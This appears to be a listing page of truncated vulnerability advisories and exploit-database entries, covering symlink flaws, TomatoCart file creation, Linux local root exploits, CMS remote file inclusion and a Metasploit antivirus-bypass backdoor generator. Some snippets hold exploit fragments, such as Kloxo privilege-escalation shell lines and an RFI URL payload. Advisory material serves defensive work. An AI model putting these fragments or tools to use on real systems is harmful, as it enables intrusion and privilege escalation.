[SECURITY] Fedora 18 Update: nodejs-cmd-shim-1.1.0-3.fc18

The cmd-shim used in npm to create executable scripts on Windows, since sym links are not suitable for this purpose there. On Unix systems, you should use a symbolic link instead, but this module supports creating shell script shims also...

Design/Logic Flaw

The Key Management feature in the SecureSphere Operations Manager SOM Management Server in Imperva SecureSphere 9.0.0.5 allows remote authenticated users to upload executable files via the 1 privatekey or 2 publickey parameter in a T/keyManagement request to plain/settings.html, as demonstrated b...

Solaris 10 Patch Cluster File Clobber

File clobbering vulnerability in Solaris 10 patch cluster 3/27/2013 Larry W. Cashdollar @larry0 Hello, The 147147-26 patch creates a CLEANUP file in /tmp that is vulnerable to symlink attacks: The contents of the file created in /tmp are: /sbin/sh:root@dev-unix-sec02 cat CLEANUP...

Kloxo 6.1.6 - Local Privilege Escalation

Exploit for linux platform in category local exploits LXLABS=cat /etc/passwd | grep lxlabs | cut -d: -f3 export MUID=$LXLABS export GID=$LXLABS export TARGET=/bin/sh export CHECKGID=0 export NONRESIDENT=1 echo "unset HISTFILE HISTSAVE PROMPTCOMMAND TMOUT" /tmp/w00trc echo "/usr/sbin/lxrestart...

TomatoCart 1.x Unrestricted File Creation

TomatoCart 1.x versions are susceptible to an unrestricted file creation vulnerability. 1. OVERVIEW TomatoCart 1.x versions are vulnerable to Unrestricted File Creation. 2. BACKGROUND TomatoCart is an innovative Open Source shopping cart solution developed by Wuxi Elootec Technology Co., Ltd. It ...

TomatoCart - json.php Security Bypass

TomatoCart - json.php Security Bypass source: https://www.securityfocus.com/bid/57156/info TomatoCart is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and create files with arbitrary shell script which may aid in further...

TomatoCart - 'json.php' Security Bypass

source: https://www.securityfocus.com/bid/57156/info TomatoCart is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and create files with arbitrary shell script which may aid in further attacks. TomatoCart versions 1.1.5 and 1.1....

Ubuntu Update for apport USN-1668-1

Ubuntu Update for Linux kernel vulnerabilities USN-1668-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN16681.nasl 7960 2017-12-01 06:58:16Z santu $ Ubuntu Update for apport USN-1668-1 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This...

USN-1668-1: Apport update

Dan Rosenberg discovered that an application running under an AppArmor profile that allowed unconfined execution of apport-bug could escape confinement by calling apport-bug with a crafted environment. While not a vulnerability in apport itself, this update mitigates the issue by sanitizing certa...

Mandrake Linux Security Advisory : man (MDKSA-2000:015)

Internet Security Systems ISS X-Force has identified a vulnerability in the makewhatis Bourne shell script that ships with many Linux distributions. It is found in versions 1.5e and higher of man, and handles temporary files insecurely. Local users may gain a variety of privileges depending on th...

Scientific Linux Security Update : bash on SL5.x i386/x86_64

Bash is the default shell for Scientific Linux. It was found that certain scripts bundled with the Bash documentation created temporary files in an insecure way. A malicious, local user could use this flaw to conduct a symbolic link attack, allowing them to overwrite the contents of arbitrary fil...

CentOS Update for bash CESA-2011:1073 centos5 x86_64

Check for the Version of bash OpenVAS Vulnerability Test CentOS Update for bash CESA-2011:1073 centos5 x8664 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under...

AZ Photo Album Script Cross Site Scripting

Exploit Title: AZ Photo Album Script Multiple Vulnerability Date: 2012 Author: Eyup CELIK Version: All Version Tested on: All versions are Vulnerability Web Site: www.eyupcelik.com.tr ISSUE XSS can be done using the command input and shell script upload Vulnerable Page: index.php File Upload - XS...

Fully Undetectable Backdoor generator for Metasploit

Fully Undetectable Backdoor generator for Metasploit Security Labs Experts from Indian launch an automated Anti-Virus and Firewall Bypass Script. Its an Modified and Stable Version in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how i...

Linux Kernel 2.6.22 Local root Exploit

Exploit for linux platform in category local exploits !/bin/sh ======================================= Linux Kernel 2.6.22 Local root Exploit ======================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ ...

bash: Insecure temporary file use in aliasconv.sh, aliasconv.bash, cshtobash (symlink attack)

bash-doc 3.2 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/cb.? temporary file, related to the 1 aliasconv.sh, 2 aliasconv.bash, and 3 cshtobash scripts...

Sun Microsystems SunScreen Firewall - Privilege Escalation

Sun Microsystems SunScreen Firewall - Privilege Escalation / Sun Microsystems SunScreen Firewall Root Exploit discovered & exploited by Kingcope January 2011 The SunScreen Firewall can be administrated remotely via a java protocol service which is running on port 3858 on a SunOS machine. This Jav...

aidSQL: A Tool to Find Vulnerable Spots in Web Sites !

aidSQL is a PHP application provided for detecting security holes in your websites. It is a modular application, meaning that you can develop your very own plugins for SQL injection detection & exploitation. Sample usage of aidsql: ./aidSQL --url=www.sample123.com We find it similar to nikto,...

Elxis CMS 2009.2 - Remote File Inclusion

\ \ \ / / / \ / / / |// / / // // / / / // // / installation folder.'; include$mosConfigabsolutepath.'/includes/systemplates/router.php'; exit; requireonce$mosConfigabsolutepath.'/includes/Core/loader.php'; file : index2.php http://site.com/elxis-cms/index2.php?mosConfigabsolutepath=sh...

YACK CMS 10.5.27 Remote File Inclusion Vulnerability

==================================================== YACK CMS 10.5.27 Remote File Inclusion Vulnerability ==================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' /' / /' 0 0 /, // ,/ / 1 1 // /' / // /' / /' 0 0 / / / ...